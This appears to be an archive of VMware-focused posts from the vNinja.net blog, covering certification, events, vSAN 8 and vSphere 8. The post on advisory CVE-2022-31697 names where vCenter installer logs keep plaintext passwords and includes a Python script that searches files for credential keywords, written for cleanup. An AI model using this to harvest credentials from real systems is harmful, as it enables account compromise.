Get planning and approval processes for travel started! --- # My Experience: VCP-DCV for vSphere 7.x 2V0-21.20 Exam URL: https://vNinja.net/2023/01/04/vcp-dcv-vsphere7-2v0-21.20/ Date: 2023-01-04 Author: stine Tags: VMware, Certification, VCP I knew one thing was going to change when I transitioned from being an operations engineer to being a consultant: the fact that I had rarely done any kind of certification. Trying to figure out what certification I should start with was a daunting prospect, but luckily, I could ask Christian Mohn, and we decided I should start with VCP-DCV for vSphere 7.x (VCP for short). It’s described by VMware as “The VCP-DCV 2022 certification validates candidate skills to implement, manage, and troubleshoot a vSphere infrastructure, using best practices to provide a powerful, flexible, and secure foundation for business agility that can accelerate the transformation to cloud computing.”, and sounds like a good place to start to showcase that you are generally skilled when it comes to working with VMware. I started on the course VMware vSphere: Install, Configure, Manage [V7] and even though I had worked with multiple VMware products for years I learned a lot. This was also the first VMware course I had taken, and I was so happy that my colleagues told me I could set the playback speed up to 2X. After the course was done, I did a lot of the tests, read through the course material and thought I would be set for the VCP exam. The exam is 70 questions in a mix of single- and multiple-choice answers, the duration is 130 minutes and the passing score is 300. My first attempt at the exam did not go well. I somehow thought I would ace it just because I had worked with VMware for so long.
I was running a fever, but instead of postponing, I felt sure it would be no problem. Needless to say, I failed. The exam is structured on the assumption that you are experienced in VMware products generally, so you are bound to get questions on things you have never worked on or thought about before. There was also a lot of material I had to cram. For example, in my day-to-day work I rarely had to calculate CPU shares and percentages, but after cramming how to do this, a lot of the questions became easier to calculate. I was determined not to fail again, so I started reading up on study guides. Christian mentioned the VCP-DCV for vSphere 7.x (Exam 2V0-21.20) Official Cert Guide and I immediately started reading it — In my opinion this is the superior study guide of all the ones I was using. I also found out that with the study guide you get access to practice exams on the Pearson site: pearsontestprep.com. This is going to sound like a sponsored article, but I cannot overstate how much the Pearson practice exams helped me. I bought the book first via Amazon and got a hold of the normal practice test, but then I bought the premium edition, which links to the eBook. Whenever I answered a question incorrectly, it immediately pointed me to the PDF of the eBook and the chapter I should reread. This was extremely helpful and made studying for the exam so much easier. When I felt like I was acing the practice exams I set a date to retake the VCP exam. One thing I can’t stress enough is that if you are taking the exam from home, you should take the pre-exam test of your equipment several times before the exam. I had done mine, but a change in the company’s antivirus program suddenly stopped the exam program from working and it made the actual exam day very stressful. Clean your desk and make sure the room you are taking the exam in is tidy. You must take pictures of the room from several angles beforehand. There is a person watching you take the exam from your webcam.
When I was taking the exam, I was asked to show my desk on several occasions. When I had gone through all my questions, I submitted my answers, and I was so happy to see that I had passed! I even got a physical pin at VMware Explore to prove it! In conclusion, I would recommend that everyone planning on taking the VCP-DCV prepare using the Pearson prep test and eBook, or follow and read everything mentioned in the prep guide. --- # CloudBytes Podcast — Season 3 URL: https://vNinja.net/2022/12/22/cloudbytes-season-3/ Date: 2022-12-22 Author: christian Tags: Podcast, CloudBytes The CloudBytes Podcast recently released Season 3 of their series of podcasts. The main topic this season is core components of cybersecurity, and I was lucky enough to be asked to be a guest on no fewer than two of the episodes: Season 3: Incident Response # Episode Summary # 11:11 Systems Director of Product Market Intelligence Brian Knudtson is joined by guests Jason Carrier, Richard Kenyan, and Christian Mohn for a conversation about the keys to an effective Incident Response plan. They discuss the importance of good communications, how to handle cloud providers, and some of the best and worst examples. This communication needs to be intentional and, once communication paths are defined and tested, the plan should be iterated on constantly. Season 3: Malware Defense # Episode Summary # 11:11 Systems Director of Product Market Intelligence Brian Knudtson is joined by guests Steve Broeder, Allan Liska, and Christian Mohn for a conversation about malware. Are cyber-criminals still lurking around each corner ready to infect your endpoints with ransomware, or are there new actors in the threat landscape? Should corporate IT still be in charge of security? We also discuss the importance of constant vigilance and DR plans. Find the episodes wherever you listen to your podcasts (they are released weekly), or check out the entire series in one go.
There are loads of great guests, topics and really good conversations here, and I’m honored to have been asked to participate. --- # Leveling Up: My First VMUG Presentation URL: https://vNinja.net/2022/12/22/leveling-up-my-first-vmug-presentation/ Date: 2022-12-22 Author: stine Tags: VMware, VMUG I’ve been a member of VMUG for years now and I’ve always looked up to the people organizing it. I got asked to give a short presentation for Norway VMUG in November and I was so honored. Then the nerves started! What should I talk about? Could I be interesting? Am I good enough? Impostor syndrome was doing a number on me, but I was adamant that I would get over this. I had always secretly wanted to speak at VMUG and now was my chance. I’ve never had a problem talking to crowds of people that I already know, but this would be in front of a lot of people I’ve never seen before, both physically in Oslo and streamed to two other cities in Norway: Bergen and Trondheim. We also had guest speaker Amanda Blevins joining us from abroad. A quick pep talk from my colleagues at Proact and the VMUG leaders, and I was convinced. I was going to give a presentation about my first trip to VMware Explore. During the week in Barcelona I took notes and pictures to prepare for the presentation. It was fun to constantly think: could this be funny or interesting to talk about during my presentation? The best picture, taken at the vRockstar event, was of Christian, Brad Tompkins (the CEO of VMUG) and me. Christian and I had not coordinated our outfits, I promise. I got home and started working on my presentation. I wanted it to be a mix of tips, experiences and a whole lot of humor. I also wrote a blog post about the subject: My First VMware Explore. I spent several hours during Explore and the two weeks after constantly writing and changing my slide deck. I also rehearsed the presentation in front of the mirror countless times.
Two weeks after Explore the day had come and I was going to give my presentation. We started the event off with some pizza and mingling. I met some people I’d never met before, and we talked a lot about shared experiences and what we currently work on. That is, in my opinion, one of the best things about VMUG meetings: the chance to meet like-minded people that work with different parts of the same product. The amazingly talented Amanda Blevins talked about Multi-Cloud Services. My brilliant co-workers Rudi Martinsen and Christian Mohn talked about news from VMware Explore. After that it was my turn. I’m not going to lie; I was very nervous and don’t really remember much about it. But what I do remember is how sweet everyone was both before and after I was speaking. VMUG really is a very inclusive community, and if you ever get asked to speak, you should definitely do it. I really hope I get asked to present again; in fact, I’m certain I’ll send in some session ideas going forward. In the meantime, I’ll continue being an active member of the community, and contribute what I can — especially cheering on new speakers. It might be daunting, at first, but it’s also very rewarding. --- # VMware vCenter CVE-2022-31697 URL: https://vNinja.net/2022/12/20/vmware-vcenter-cve-2022-31697/ Date: 2022-12-20 Author: christian Tags: vSphere, vCenter, VMware VMware has released security advisory VMSA-2022-0030, which includes several vulnerabilities: CVE-2022-31696, CVE-2022-31697, CVE-2022-31698 and CVE-2022-31699. Among these, CVE-2022-31697 caught my eye as a potential issue in many environments. The vCenter Server contains an information disclosure vulnerability due to the logging of credentials in plaintext. A malicious actor with access to a workstation that invoked a vCenter Server Appliance ISO operation (Install/Upgrade/Migrate/Restore) can access plaintext passwords used during that operation.
This means that any workstation in your environment that has run a vCenter Server Install, Upgrade, Migrate or Restore operation probably has plaintext credentials for vCenter lying around on the local disk. As we all know, most ransomware and malware scan file systems for credentials before wreaking havoc in an environment, and cleartext credentials like this are easy to automatically find and pick up for later exploitation. For Windows operating systems, these files are located in %AppData%\Roaming\vcsa-ui-installer. I have not verified the location of those files on Mac or Linux operating systems yet, and frankly VMware should have disclosed those locations in the CVE or a KB. Ensure that these files are deleted from all workstations that have been used to upgrade your vSphere environment over the last few years. This also means the plaintext logs might be replicated to file servers and backed up/replicated elsewhere, so now might be a good time to change your administrator@vsphere.local password, even if you are running on a version that has been patched. These log files have been around since at least vCenter 6.5. The advisory is valid for the following versions:

| Product | Version |
|---|---|
| vCenter Server | 7.0 |
| vCenter Server | 6.7 |
| vCenter Server | 6.5 |

Note that vCenter 8.0 is not included. My Thoughts # I really wish VMware had been clearer in their recommendations in this advisory. At the very least the location of the files/logs with plaintext passwords should have been disclosed, to make it easier for admins to search for, and clean up, leftovers from older versions in their environment. Given the average dwell time for ransomware before actually doing harm, odds are that the passwords in these files are already compromised. While it is virtually impossible for VMware to clean this up retroactively, detailing proper cleanup procedures for residual files should really be the minimum effort here. Highlighting the possible need to change passwords should also have been included in the advisory.
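Sweeping workstations for leftover installer logs can be scripted. A rough sketch (the Windows location is the one mentioned above; the keyword list is my own assumption, so adjust it to whatever your logs actually contain):

```python
import os

# Assumption: simple keyword matching is enough to flag candidates;
# tune the list to your environment before trusting the results.
KEYWORDS = ("password", "passwd")

def find_suspect_files(root: str):
    """Yield paths under root whose contents mention any credential keyword."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as fh:
                    text = fh.read().lower()
            except OSError:
                continue  # unreadable file; skip it
            if any(keyword in text for keyword in KEYWORDS):
                yield path

# e.g. on a Windows workstation, per the location in the post:
# for hit in find_suspect_files(os.path.expandvars(r"%AppData%\Roaming\vcsa-ui-installer")):
#     print(hit)
```

Anything this flags should be reviewed and securely deleted, and the passwords it contained rotated.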
Simply patching the vCenter instance with a new version does not fix the issue in this case, as the credential leakage comes from previous versions of the installer. Thus passwords might be stored in log files from older non-patched versions on workstations in your environment, even on workstations no one remembers running an install from, back when the vCenter 6.7 appliance was released in 2018 (and if you haven’t changed the administrator password since then, it’s obviously time to do it now). In my mind, a KB should have been issued with the CVE, highlighting the locations of the logs in question, the likely need for password rotation and the actual real-world ramifications of the issue. --- # vSAN 8 ESA VMware Compatibility Guidance URL: https://vNinja.net/2022/12/07/vsan8-esa-vmware-compatibility-guidance/ Date: 2022-12-07 Author: christian Tags: vSphere, vSAN, VMware, ESXi VMware has just released a new KB90343: What You Can (and Cannot) Change in a vSAN ESA ReadyNode™. For those looking to utilize the new vSAN 8 Express Storage Architecture (ESA) this is a great resource that outlines what components in a vSAN ESA ReadyNode™ can be changed. As outlined in KB90343, CPU, Memory, Storage Device, NIC and Boot Device can all be changed from the defaults — check the KB for details. The vSAN ESA VCG is also available, albeit with a small number of vendors for the time being. The KB also includes a very handy vSAN ESA ReadyNode™ FAQ, which includes advice on specific device requirements and minimum network requirements. An updated vSAN Sizer that supports ESA is also under development, and should be available soon. --- # My First VMware Explore URL: https://vNinja.net/2022/12/02/my-first-vmware-explore/ Date: 2022-12-02 Author: stine Tags: VMware, VMware Explore, Explore, Barcelona Weirdly, I have worked mainly with VMware products for years now without having the pleasure of going to VMware Explore. This year that was about to change, and I was so excited!
I was heading from the cold weather of Norway to sunny Barcelona to attend VMware Explore Europe and I could hardly wait. I have written down a little recap of my trip, with some tips and tricks for other people that might not have gone to Explore before. Firstly, I should mention that this conference was a tad crowded this year. From what I heard, a lot of people registered late, so the conference had been scaled down, and that meant there were some space issues. In fact, the first day I was worried we’d have a Woodstock '99 situation, but luckily I was proved wrong by all the wonderful people that met up and shared a great week together, even if it was packed. Here are some tips I gathered during my first Explore, and how I arrived at them: Book early # One thing I wasn’t aware of beforehand was how quickly you had to book sessions. My colleague tipped me off that the sessions were already filling up and I didn’t even realize that you had to book anything. I rushed onto the site and managed to book a lot of stuff and felt pleased with myself. Don’t overplan # This however brings me to the next thing I didn’t know about big conferences like this: planning too much is never a good idea. One thing is that it’s difficult to retain so much information and keep your concentration up for so many hours, but another is that you won’t have time to get from one session to another in that short amount of time. The conference is big, so you end up walking loads. Wear good shoes and take breaks often # Speaking of walking loads, you should bring some good shoes with you. The venue this year was big, and I can’t imagine that changing anytime soon. I averaged about 10,000 steps at the venue every day. Another important thing is to take breaks with colleagues or on your own. There are a lot of places you can grab some drinks, food or just sit in the sun. The days end up being long, and hopefully you have a lot of cool stuff on your mind, so it’s important to take some time to chill.
Wherever you are going, get there early # I arrived early this year and went to Explore one day before it officially started, but the backpacks with shirts were already down to small and extra small sizes. When the keynote was starting the first day, I was pleased to get to the venue quite early, but most seats were taken already. Luckily, I found a chair at what turned out to be my favorite area: VMware Communities and {code}. The visibility left a little to be desired, but the energy in the room was amazing. Later that day I headed to the vendor area, and I got introduced to the vast amounts of merchandise from different vendors. Wherever the longest queue is, that is where you will find the best free merch. Bring your backpack, you’ll probably end up with quite a bit of free stuff in the end. Sessions # As mentioned before, loads of the sessions were booked out early, but if you get to the hall a bit early, you can stand in line to get in if there are some free places. Places like “VMware Communities and {code}” have smaller sessions that you can just meet up and join without booking beforehand. Here’s a link to their content: vBrownbag 2022 VMware Explore TechTalks. My absolute favorite session was “Meet the experts” where I got to talk to William Lam and Dave Morera about the new features in vSphere 8 in a small group of people. Social events # There are so many events and parties planned during Explore, from huge parties arranged by vendors to small gatherings planned by participants. From all the events I attended, the best ones turned out to be the chill evenings with my colleagues just chatting in the hotel bar. And this brings me to the end of my recap and experience of VMware Explore. It was an excellent conference and I really hope I get to go back next year!
--- # VMware vSAN 8 ESA in my Homelab URL: https://vNinja.net/2022/11/24/vsan8-esa-in-homelab/ Date: 2022-11-24 Author: christian Tags: vSphere, vSAN, VMware, ESXi
Ever since vSAN 8 was announced, I’ve been waiting to try out the new Express Storage Architecture in my HomeLab, especially since the internal storage in my hosts is NVMe only.
“#vSphere 8 with new USB NIC Fling version 1.11 looking good in my HomeLab. Rest of this cluster to do tomorrow, and vSAN ESA here we come! #vExpert #VMware” — Christian Mohn™ (@h0bbel) November 23, 2022
Yesterday the last piece of the puzzle was released, namely the new USB Network Native Driver v1.11 for ESXi 8, which I needed before reinstalling my hosts in order to get vSAN traffic isolation. Armed with the new USB NIC drivers, I reinstalled three of my four hosts with ESXi 8 and then manually installed the USB NIC drivers. One of the reasons I wanted to do a reinstall was to get rid of the external USB-connected SSD boot medium I have used since the lab was set up. One of the problems I had with running vSAN 7 in this environment was that on two of my hosts, the device used as a cache device for vSAN randomly went offline under heavy load. The device just went AWOL until the host was rebooted, and then it was OK again, until the next time. At the same time, I moved all my vSAN traffic off my 1 GbE switch and over to a new QNAP QSW-1108-8T 8-Port 2.5Gbps Unmanaged Switch. The new networking setup, and switch, is dedicated to vSAN and vMotion traffic through a new VDS, with one Port Group for each traffic type, and with two uplinks. Uplink 1 is configured as the active uplink for the vMotion PG with Uplink 2 as a Standby Uplink, and the reverse for vSAN traffic.
This networking tweak means I no longer need to use VLANs for the vMotion and vSAN traffic (the new switch doesn’t support them anyway), and it gives me a throughput increase from 1 GbE to 2.5 GbE at the same time. I have four hosts in total, so this little 8-port switch now gets a run for its money (and it does run a bit hot, it seems). The last host was then reinstalled, and I decided to try using vSphere Lifecycle Manager to create an Image containing the USB NIC fling and then use it to remediate the host, which also worked out perfectly. Once the hosts were installed and configured, it was time to enable vSAN and try out the new Express Storage Architecture. vSAN ESA is configured in the same way as the traditional OSA version; you just select that you want ESA at configuration time.
Configuring vSAN 8 ESA # Selecting ESA is just a little tick box, and off it goes. As shown in the screenshot above, my NVMe devices are listed as incompatible (i.e. not on the HCL), but that doesn’t stop the configuration from going forward. I manually claimed the disks and continued the setup. I didn’t configure any custom fault domains, and moved on to the review screen. A few minutes later, I had a brand new vSAN 8 ESA cluster up and running! Skyline Health complains about the unsupported NVMe devices and the network throughput, but that’s to be expected. Of course, this setup is very much unsupported by VMware. The USB NICs I use are not supported; thankfully the USB NIC Fling is available, but it’s not intended for production use. vSAN ESA also has a recommended minimum network rate of 25 GbE, not the 2.5 GbE I’m running. The NVMe devices I use are not on the vSAN ESA HCL or VCG, and to top it off, vSAN ESA also requires a minimum of 4 NVMe devices per host — I have one. So, while this setup works, it is very much a home lab setup. So there it is, my completely unsupported vSAN 8 ESA configuration.
--- # VMware Explore Europe 2022: My Immediate Thoughts URL: https://vNinja.net/2022/11/11/vmware-explore-europe-2022-my-thougths/ Date: 2022-11-11 Author: christian Tags: VMware, VMware Explore, Explore, Barcelona
This week saw the return of VMworld, post-pandemic renamed to VMware Explore, in Europe. As has been the case for several years now, it was held in the Fira Gran Via in Barcelona. This year’s theme was Multi Cloud, and going from Cloud Chaos to Cloud Smart, but one of the other main things customers seem focused on in Europe is Sovereign Cloud. I guess this is a bigger focus in Europe than it is in the US, especially since there are different regulations in place here, and many customers span several regions. Of course, there was other news as well, which I plan on covering in future posts.
The good # As far as going back to physical events goes; finally! We have all been waiting for this, and while video and online content is good, nothing beats meeting up in person (perhaps not including “barefoot guy”, who probably should have stayed at home). People absolutely seem ready for physical events again; the energy and buzz at the venue was fantastic. According to people who also attended the US event, the European event was much more upbeat, with more energy and enthusiasm, and the questions both in the sessions and on the Expo floor were of a more technical nature. Way to go Europe! I also had the chance to have some excellent customer meetings, with VMware representatives, at the event. This is an invaluable resource, and getting customers in front of Program Managers and technical resources from VMware is always a good thing. As I’ve said on many occasions before, this is where I find real value in these events: meeting my friends in the industry, making new connections, and introducing my customers to the right people in order to create joint value.
The bad # That being said, I have a feeling that VMware misjudged the attendance level this year.
It may be due to a “hockey stick” growth in attendees, but when you run out of backpacks on Monday (and the conference doesn’t really start until Tuesday), something is off. The same goes for the General Session on Tuesday, when there simply wasn’t enough room to hold everyone who wanted to view it live, even if it was streamed online simultaneously. The venue seemed undersized for the attendance numbers, while at the same time being almost too large to walk around effectively. The Expo floor was sized well, but the rest was a problem. The hot lunch area was too small, and ineffective. The whole area felt big, but at the same time cramped and off-kilter. Session rooms were too small as well, causing long queues and lots of people not getting into the sessions they wanted to attend. Even though some sessions were repeated, some even three times, there were still lines of people trying to get in. The VMware Communities and {code} area was also undersized, with too few blogger/community tables and chairs, and with the theatre so close, it was almost impossible to have a proper conversation there. Kudos to vBrownbag, who had a seemingly endless stream of content, but going forward there should probably be more space available in that area. It was fantastic to be able to actually meet people again and have a quick chat. Some of the people I met this week I hadn’t seen in years, and even if we only got a chance to spend 5 minutes talking during the week, it was great being able to do so again.
VMware Explore, now what? # There are no official numbers yet, at least none that I’ve seen, but rumor has it that 2022 was the year the European event eclipsed the attendee numbers of the US one. If not, it’s going to be very close. Details for VMware Explore 2023 have not been announced yet, so we’re all waiting to hear what’s up for 2023. Based on this year’s event, I can’t envision it going back to virtual-only again.
Conclusion # All in all: an awesome event. It was as if the good old days were back, meeting people in the flesh again. The energy of the event was great, and I can’t wait until next time! I’ll chalk all the problems listed above up to attendee numbers being a post-pandemic surprise, and cross my fingers that they will be fixed for future events. After seeing this year’s event, I’m sure Hock E. Tan and Broadcom have been paying attention as well. Oh, and I’ve had enough cerveza, jamon and tapas to last, well, just about a year or so. Step Count: 75432 Kilometers: 53.3 Exhausted: True
Here’s a small video I created at the event #
--- # VMware vSAN 8 Announced — New Architecture Model! URL: https://vNinja.net/2022/08/30/vmware-vsan8-announced/ Date: 2022-08-30 Author: christian Tags: vSphere, vSAN, VMware, ESXi
Guess what? With vSphere 8 comes vSAN 8, and with it a slew of improvements and even a brand new architecture option! This new, optional, next-generation architecture is built into vSAN 8, and going forward customers can choose which architecture to deploy:
- vSAN Original Storage Architecture (OSA)
- vSAN Express Storage Architecture (ESA)
vSAN Original Storage Architecture (OSA) # This is the traditional vSAN architecture we are already accustomed to, with dedicated cache and capacity drives making up Disk Groups that vSAN enabled hosts can consume and share within a cluster. It is available both as a hybrid (Flash+HDD) and as an all-flash solution. While the new vSAN Express Storage Architecture (ESA) is the flagship news in vSAN 8, there are also a few welcome improvements for vSAN Original Storage Architecture (OSA) in vSAN 8.
- Increased maximum capacity on devices in the cache/buffer tier for OSA
  - Cache/buffer tier maximum increased from 600GB to 1.6TB per disk group (All-flash)
- Health Monitoring for Limited Connectivity Environments
  - Proactive notifications for environments not enrolled in the Customer Experience Improvement Program (CEIP)
  - Available in both vSAN OSA and ESA deployments
A rather limited list of improvements for vSAN OSA in v8, but it was about time the cache device size was increased.
vSAN Express Storage Architecture (ESA) # The new hotness, vSAN Express Storage Architecture (ESA), is an NVMe-only option, which at launch requires a minimum of 4 NVMe devices per host. Gone are the concepts of cache devices and capacity devices, as well as the Disk Group concept. That’s right, no more vSAN Disk Groups in ESA, which helps lower the size of failure domains. Basically, ESA is a single-tier architecture for all-NVMe, TLC-based storage devices. vSAN ESA will only be available on ESA-approved vSAN Ready Nodes (and VxRail models, I presume). This means that there is a separate ESA HCL. It also requires vSAN Advanced, or Enterprise, licensing. At the time of announcement there is no upgrade path from OSA to ESA; migration is done via vMotion/SvMotion to a new ESA cluster. The choice between OSA and ESA is made at time of deployment, and there is, at least currently, no option to change a cluster from one architecture to the other. The new architecture is managed in the same way as OSA, through vCenter and the Distributed Object Manager. It enables quite an extensive list of new features and improvements:
- New Log-Structured File System
  - Reduces I/O amplification
  - Low overhead
  - Allows for high performance snapshots
- New I/O engine for Modern Flash Devices
  - New Log Structured Object Manager in vSAN ESA
  - Highly parallel & efficient I/O engine that promises high bandwidth, low latency, and consistent scaling.
- Express Storage Architecture (ESA) combines performance and capacity components into a single object, using components called legs
  - Performance leg
    - Ingests writes
    - Prepares data for full stripe width
    - Always a RAID-1 mirror
    - FTT of mirror equal to storage policy
    - Lives on the same hosts as the capacity leg components
  - Capacity leg
    - Combined data written as a full stripe write
    - Adheres to storage policy (RAID-5, RAID-6, etc.)
- Optimized data handling
  - Compression of data happens once, at ingest. This reduces the network traffic and CPU resources required.
  - Encryption of data happens once, at ingest, which also reduces CPU requirements.
  - Data checksums are calculated at ingest, and reuse already calculated CRCs.
  - Asynchronous full stripe writes. These writes are fully parallel, and eliminate read-modify-write activities.
- New High Performance RAID-5/6 Erasure Coding
  - Performance of RAID-5/6 will be equal to RAID-1
  - Adaptive RAID-5 improves space efficiency in smaller clusters.
    - Automatic adjustment of the RAID-5 scheme, based on cluster size.
    - 4+1 scheme used for 6 or more hosts, 2+1 scheme for 3-5 hosts.
    - 4+1 scheme uses 1.25x capacity, 2+1 scheme uses 1.5x.
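The adaptive RAID-5 behavior lends itself to a quick back-of-the-envelope calculation. Here is a minimal Python sketch, assuming only the scheme selection and overhead figures quoted in the announcement; the function names are mine, not anything in the vSAN API:

```python
def raid5_scheme(hosts: int) -> tuple[int, int]:
    """Return the (data, parity) RAID-5 layout vSAN ESA is described as
    choosing by cluster size: 4+1 for 6+ hosts, 2+1 for 3-5 hosts."""
    if hosts >= 6:
        return (4, 1)
    if hosts >= 3:
        return (2, 1)
    raise ValueError("vSAN requires at least 3 hosts")

def capacity_overhead(data: int, parity: int) -> float:
    """Raw capacity consumed per unit of usable data."""
    return (data + parity) / data

print(capacity_overhead(*raid5_scheme(6)))  # 4+1 -> 1.25
print(capacity_overhead(*raid5_scheme(4)))  # 2+1 -> 1.5
```

In other words, growing a RAID-5 cluster from 5 to 6 hosts lets ESA switch schemes and reclaim a sixth of the raw capacity.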
- Storage Policy-based Compression Capabilities
  - Toggled by storage policy — enabled by default
  - Minimal performance impact
  - Finer granularity of compression rates, compared to vSAN OSA
  - Improved efficiency with up to 8:1 compression ratios per 4KB data block
- Reduced Overhead Encryption
  - Encryption occurs earlier in the write path, in order to minimize CPU resource usage and I/O amplification
  - Eliminates decrypt/re-encrypt steps for reduced CPU consumption and increased network efficiency
- Improved Point-in-Time native snapshots
  - Vastly improved snapshot performance, with low stun times
  - Highly scalable and efficient
  - Seamless integration with vSphere & 3rd party VADP backup solutions
  - Snapshots of objects in degraded status
Check core.vmware.com/vsan for the most up to date documentation on vSAN 8.
Closing Comments # It is obvious that going forward, the new vSAN Express Storage Architecture (ESA) should be the preferred choice for most deployments. The world has pretty much moved on from SSDs to NVMe devices, and a new architecture model that makes better use of those devices is clearly a good idea. The improvements that ESA promises, from a performance (CPU usage and I/O) perspective alone, make it very interesting. Getting rid of the management overhead, and the failure-domain issues, that come with the Disk Group (cache and capacity devices) construct in vSAN OSA is also a welcome change. Simplifying the design and implementation while at the same time improving performance sounds like a good deal to me. If vSAN 8 ESA delivers what it promises, this is a very welcome and big upgrade from the vSAN we already know.
Resources # Last updated 01.
september 2022
- VMware: Dave Morera announces vSAN 8 (YouTube)
- VMware: Announcing vSAN 8
- VMware: vSAN Express Storage Architecture (ESA)
- VMware: Virtually Speaking Podcast: Introducing vSAN 8 and the Express Storage Architecture
- StorageReview: VMware vSAN 8 Express Storage Architecture Announced
--- # VMware vSphere 8 — The Enterprise Workload Platform Announced! URL: https://vNinja.net/2022/08/30/vmware-vsphere8-announced/ Date: 2022-08-30 Author: christian Tags: vSphere, vSAN, VMware, ESXi
VMware announces vSphere 8 — The Enterprise Workload Platform at VMware Explore US. The new release comes with a number of new features and enhancements. At the time of writing, no set General Availability date has been published, but look for it becoming available sometime this fall. Here’s a quick summary:
vSphere Distributed Services Engine # Remember Project Monterey, announced as a Tech Preview at VMworld 2020?¹ Parts of that have now found their way into the core vSphere 8 offering. Called the vSphere Distributed Services Engine, this enables the offloading of network services to Data Processing Units (DPUs). This first version enables offloading of NSX Services to a SmartNIC (DPU) using a new vSphere Distributed Switch version 8.0. Offloading the processing of network traffic to a DPU instead of using the CPU frees up resources that hosts and VMs can take advantage of, and helps increase network performance. It will also enhance visibility and observability of the network traffic, and provide better encryption, isolation and protection. See DPU-based Acceleration for NSX: Deep Dive (YouTube) for more details.
VMware vSphere with Tanzu # vSphere now runs Tanzu Kubernetes Grid (TKG) 2.0, with the following enhancements:
- Unified Tanzu Kubernetes Grid
- Increased availability with Workload Availability Zones
- Declarative cluster lifecycle with ClusterClass
  - Define It Once, Use It Many Times — this is an upstream Kubernetes conformant ClusterAPI.
  - Defines configuration and default installed packages for Tanzu Kubernetes clusters.
  - ClusterClass is defined in the cluster deployment specification.
- Customize PhotonOS or Ubuntu images
- Pinniped Integration
  - Bring Your Own Identity Provider; you can now decouple Kubernetes identities from the vCenter Single Sign-On Domain.
  - Pinniped federates identity from many identity providers (IDPs)
  - OIDC and LDAP support
  - Supervisor and TKG Clusters support Pinniped-based authentication
  - Login integration through Tanzu CLI
Lifecycle Management # Lifecycle Manager Images is the default option going forward.² vSphere 8 is the last release where Lifecycle Manager baselines (vSphere Update Manager) are supported; only vSphere Lifecycle Manager (vLCM) images will be supported going forward.
- Enhanced Recovery of vCenter
  - Recover vCenter without data loss.
  - Cluster state persists in ESXi hosts as a Distributed Key-Value Store (DKVS)
  - The distributed key-value store becomes the cluster source of truth
  - vCenter cluster state reconciles with the vSphere cluster during backup recovery
In short, this means that in a scenario where a host was added to a cluster after a vCenter backup was taken, and vCenter is restored to that earlier backup, vCenter reconciles the cluster state with the state from the Distributed Key-Value Store (DKVS).
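The reconciliation idea can be sketched as a tiny set comparison. This is a hedged illustration, assuming a simple set model of cluster membership; the function and host names are mine and have nothing to do with VMware's actual implementation. The point is only that the DKVS held by the ESXi hosts wins over the possibly stale vCenter backup, so a host added after the backup was taken is not lost:

```python
def reconcile_cluster(backup_hosts: set[str], dkvs_hosts: set[str]) -> set[str]:
    """Return post-restore cluster membership: the DKVS on the hosts is
    the source of truth, not the (possibly stale) vCenter backup."""
    rediscovered = dkvs_hosts - backup_hosts
    if rediscovered:
        print(f"Re-adding hosts missing from backup: {sorted(rediscovered)}")
    return set(dkvs_hosts)

# Hypothetical scenario: esx04 joined the cluster after the backup was taken
backup = {"esx01", "esx02", "esx03"}
dkvs = {"esx01", "esx02", "esx03", "esx04"}
assert reconcile_cluster(backup, dkvs) == dkvs  # prints: Re-adding hosts missing from backup: ['esx04']
```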
Other enhancements and news:
- Staging Support
  - Stage update payloads in advance of remediation, without the need for maintenance mode
  - Reduces overall remediation time and time spent in maintenance mode per host
  - Less risk of remediation failure from live image transfer
  - Firmware payloads staged with Hardware Support Manager integration
- Parallel Remediation
  - Remediate multiple hosts in parallel
  - Reduces the lifecycle operation time of a cluster
  - The vSphere Administrator decides how many hosts will be remediated in parallel by placing the desired hosts into maintenance mode
  - It is my understanding that in vSAN enabled clusters, only one host will be allowed to remediate at a time, to ensure that all data in a cluster remains available at all times.
- vSphere Configuration Profiles
  - Configuration Management at scale — the future replacement for Host Profiles, available as a Tech Preview in vSphere 8
  - A new desired-state model for all configuration options, with compliance drift monitoring. Remediates hosts back to the desired state.
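The parallel-remediation constraint on vSAN clusters can be sketched as a simple batching rule. This is my own toy model, not the vLCM API: hosts the administrator has placed into maintenance mode are remediated together, except in a vSAN cluster, where hosts go one at a time so all data replicas stay reachable:

```python
def remediation_batches(hosts_in_maintenance: list[str], vsan_enabled: bool) -> list[list[str]]:
    """Group hosts into remediation batches: all at once normally, one at a
    time when vSAN needs every remaining host's replicas available."""
    if vsan_enabled:
        return [[host] for host in hosts_in_maintenance]
    return [hosts_in_maintenance] if hosts_in_maintenance else []

print(remediation_batches(["esx01", "esx02"], vsan_enabled=False))  # [['esx01', 'esx02']]
print(remediation_batches(["esx01", "esx02"], vsan_enabled=True))   # [['esx01'], ['esx02']]
```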
- Standalone Host Support (API only)
- VCG Listings for Hardware Security Modules feature support
- DPU Support
Unified Management for AI/ML Hardware Accelerators #
- Combine NIC and GPU devices
- Share a common PCIe switch or a direct interconnect
- Discovered at the hardware layer and presented to vSphere
- Added to a virtual machine as a single unit
- NVIDIA® support launching shortly after vSphere 8 GA
Next-Generation of Virtual Hardware Devices — Device Virtualization Extensions (DVX) #
- New API for vendors to create hardware-backed virtual devices
- Supports vSphere DRS and vSphere HA
- Can support live migration using vSphere vMotion
- Can support VM suspend and resume
- Can support disk and memory snapshots
Guest OS & Workloads #
- Virtual Hardware version 20
  - Latest Intel and AMD CPU support
  - Device Virtualization Extensions
  - Up to 32 DirectPath I/O devices
  - Guest Services for Applications
  - vSphere Datasets
  - Application-aware migrations
  - Latest guest operating system support
- Performance and Scale
  - Up to 8 vGPU devices
  - Device Groups
  - High Latency Sensitivity with Hyperthreading
- Virtual TPM Provisioning Policy
  - Choose between Copy or Replace when deploying VMs configured with vTPM devices
  - Copy will clone the TPM secrets
  - Replace will reset the vTPM device as new
  - ovftool support for a vTPM device placeholder
- Migration-aware applications
  - Notify supported applications about migration tasks, and let the application acknowledge that the migration can proceed
  - Use-cases: time-sensitive applications, VoIP applications, clustered applications
- High latency sensitivity with hyper-threading
  - Virtual Machine vCPUs are scheduled on the same hyperthreaded physical CPU core
- Simplified vNUMA configuration
  - Virtual NUMA topology and configuration is exposed in the vSphere Client
  - Configure virtual NUMA during new VM creation
  - Edit CPU Topology settings of an existing VM
- vSphere DataSets
  - Share data between vSphere and a Guest OS
  - Data is stored and moves with the VM
  - Use-cases: guest deployment status, guest agent
configuration (perfect for things like SaltStack or similar), and guest inventory management.
vSphere Scalability # Not much has changed as far as maximum configurations go; check the table below for details. Always check configmax.vmware.com for updated information.

| Compute Resource | vSphere 7 U3 | vSphere 8 |
